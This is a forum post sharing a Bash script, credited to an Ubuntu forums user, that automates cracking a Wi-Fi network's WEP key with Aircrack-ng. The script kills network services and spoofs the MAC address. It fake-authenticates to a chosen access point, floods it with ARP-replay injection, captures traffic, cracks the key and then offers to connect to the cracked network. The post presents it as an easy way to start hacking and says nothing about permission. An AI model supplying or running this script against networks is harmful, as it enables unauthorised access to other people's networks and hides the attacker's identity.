taylor102387 of Ubuntu forums created this really kick ass Bash Script for Aircrack-ng users. Simply follow simple prompts and you are on your way to hacking in one of the most simplest of ways. It also asks you if you want to change your MAC address with macchanger as well, which is neat Code: Select All #!/bin/bash #Kills the processes that may use your adapter. sudo killall NetworkManager sudo killall NetworkManagerDispatcher sudo killall wpa_supplicant sudo killall avahi-daemon clear #Stores your adapter to a variable: interface read -p "Enter the Interface you would like to use : " interface echo "" clear #Starts the adapter in monitor mode just in case you want to run kismet. sudo airmon-ng start $interface clear #Ask if you have gathered packets and want to keep your temporary files from before. read -p "If you have already ran this script and have temporary files left over from your last session, than you can continue using these files to add to your database of IV's. Would you like to keep these files for the cracking proccess later? (NOTE: If you select n, any temporary files from a previous session will be deleted.) (Y/n) : " temp echo "" #Reads the variable temp and if y will leave the directory Aircrack-ng-BASH-Script alone. If n it will delete any previous Aircrack-ng-BASH-Script directory. if [ temp = y ]; then echo "Continueing..." else sudo rm -R "Aircrack-ng-BASH-Script" clear fi #Ask you if you would like to run kismet, and if so stores your answer to a variable: kismetm clear read -p "Would you like to run kismet to find a network to crack, and/or a client to fake your MAC Address? (Y/n) : " kismetm echo "" #If the variable kismetm equals y, the line will create a folder called: Aircrack-ng-BASH-Script, and store all temporary files there. Then it will run kismet. if [ $kismetm = y ]; then mkdir "Aircrack-ng-BASH-Script" cd "Aircrack-ng-BASH-Script" fi clear if [ $kismetm = y ]; then clear sudo xterm -e "kismet" & echo "Continuing... " fi clear #Stores your desired transmission rate to a variable: rate read -p "Enter the Transmission Rate would you like to set your interface: 1M, 2M, 5.5M, 6M, 9M, 11M, 12M, 18M, 24M, 36M, 48M, 54M : " rate echo "" clear #Ask you if you would like to change your interfaces mac address, and if so stores your answer to a variable: macset clear read -p "Would you like to change your Wi-Fi card's MAC Address? (Y/n) : " macset echo "" #This sets the MAC Address to what you choose verifymac="n" if [ $macset = y ]; then until [ $verifymac = y ]; do #If the variable macset equals y, the script will ask if you would like a random mac address, and if so stores your answer to a variable: ramac if [ $macset = y ]; then clear read -p "Would you like a random MAC? (y/N) : " ramac clear echo "Continuing... " fi #If the variable ramac equals y, the script will change your wifi cards mac address at random. if [ $ramac = y ]; then sudo ifconfig mon0 down sudo ifconfig $interface down sudo macchanger -r mon0 sudo macchanger -r $interface sudo ifconfig mon0 up sudo ifconfig $interface up fi clear #This displays your mac address from your interface so you can confirm it. sudo macchanger -s mon0 echo " " #This will ask for your confirmation on your mac address, and if you wish to change it will store it to a variable: hmac read -p "Please confirm MAC Address above, or provide a different MAC Address you want if you wish to change you MAC Address. : " hmac echo "" clear #This reads the variable ramac and if n with change your interface to the desired mac address. if [ $ramac = n ]; then sudo ifconfig mon0 down sudo ifconfig $interface down sudo macchanger -m $hmac mon0 sudo macchanger -m $hmac $interface sudo ifconfig mon0 up sudo ifconfig $interface up fi clear #This sets your wifi cards mac address to the mac address of airmon-ng's mon0. if [ $macset = n ]; then sudo macchanger -m $hmac $interface sudo macchanger -m $hmac mon0 fi clear #This confirms the MAC Address sudo macchanger -s mon0 echo " " read -p "Is this the MAC Address you want? (Y/n) : " verifymac echo "" done fi clear #This will ask for your confirmation on your mac address, and if you wish to change it will store it to a variable: hmac clear if [ $macset = n ]; then sudo macchanger -s mon0 echo " " read -p "Please confirm MAC Address above. : " hmac echo "" clear sudo macchanger -m $hmac $interface sudo macchanger -m $hmac mon0 fi #This sets your wifi card to the transmission rate you want. verifyap="n" until [ $verifyap = y ]; do sudo iwconfig $interface rate $rate clear #This next lines of commands ask for the necessary information about your access point. read -p "Enter the Wi-Fi Access Points MAC Address : " mac echo "" clear read -p "Enter the Wi-Fi Access Points SSID : " ssid echo "" clear read -p "Enter the Wi-Fi Access Points Channel : " channel clear #This will verify the info you have just typed, and will ask you if it's correct. This will then store it to a variable: start echo "Is this correct? : Wi-Fi Card: Interface: $interface Interface's MAC: $hmac Transmission Rate: $rate Wi-Fi AP: Wi-Fi AP's MAC: $mac SSID: $ssid Channel: $channel " read -p "(Y/n) : " verifyap echo "" #This will read variable start and if y, will continue. If the variable start is no, it will reset your wifi card and start over. if [ $start = y ]; then echo "Starting..." fi done clear #This will close the kismet window. sudo killall xterm clear #The next two lines will stop your wifi card and kill kismet to save cpu power for the cracking process. It will then start your wifi card in monitor mode and with the desired channel. sudo airmon-ng stop mon0 sudo killall kismet sudo airmon-ng start $interface $channel clear #This will create a folder, if kismet was not run, called: Aircrack-ng-BASH-Script, and store all temporary files there. if [ $kismetm = n ]; then mkdir "Aircrack-ng-BASH-Script" cd "Aircrack-ng-BASH-Script" fi #This will start airodump-ng on the right channel and target the access point you desire. sudo xterm -hold -e "airodump-ng -c $channel --bssid $mac -w output mon0" & echo "Starting Injections... " #The next two lines will set your card on the channel you desire and try to fake authenticate you on the network you wish to crack. sudo iwconfig $interface channel $channel sudo aireplay-ng -1 0 -e "$ssid" -a $mac -h $hmac mon0 echo " " #This will start requesting arp request at an average of 500 packets per second. sudo xterm -hold -e "sudo aireplay-ng -3 -b $mac -h $hmac mon0" & #If the above authorization fails, you can choose to start a more direct authorization. It will then store your answer to variable: ivs read -p "Would you like to keep Re-autherizing yourself? (If you stop receiving IV's) (y/N) : " ivs echo "" #This will read variable ivs and if y will open a new window and start fake authorizing you as client. clear if [ $ivs = y ]; then clear sudo xterm -hold -e "aireplay-ng -1 6000 -o 1 -q 10 -e "$ssid" -a $mac -h $hmac mon0" & clear echo "Continuing... " fi #This will ask you if you would like run aircrack-ng. It then stores your answer to variable: aircrack read -p "Run Aircrack-ng? (Y/n) : " aircrack echo "" #This will read variable aircrack and if y will launch aircrack. if [ $aircrack = y ]; then clear sudo xterm -hold -e "aircrack-ng -z output*.cap" & clear fi #This will ask you if you would like to delete the temporary files then stores your anwser to variable delete. clear read -p "Would you like to delete the temporary files created during the gathering proccess? (y/N) : " delete echo "" #This will read the variable delete and if y will delete the files, if n it will leave the folder alone. if [ $delete = y ]; then sudo rm -R "Aircrack-ng-BASH-Script" clear else echo "Continuing..." fi #This will ask you if you would like to stop your cracking and store your answer to variable: connect clear read -p "Would you like to connect to the Wi-Fi AP you just cracked? (Y/n) : " connect echo "" clear #This will read variable connect and if y will stop cracking and start networkmanager for connecting to the network you cracked. If no it will stop cracking. if [ $connect = y ]; then sudo airmon-ng stop mon0 sudo NetworkManager sudo iwconfig $interface rate 54M sudo killall kismet sudo killall xterm else sudo airmon-ng stop mon0 sudo killall xterm sudo killall kismet sudo iwconfig $interface rate 54M exit fi #This confirms you successfully cracked the network clear read -p "Did you successfully crack the network? (Y/n) : " comp echo "" clear if [ $comp = y ]; then exit 0 else exit 1 fi Note that if you download the attachment script that you might need to set permissions as 755 by chmod before you can run it as a script. E.g: Code: Select All sudo chmod 755 '/root/Desktop/Aircrack-ng-SCRIPTS/Aircrack-ng BASH Script.sh'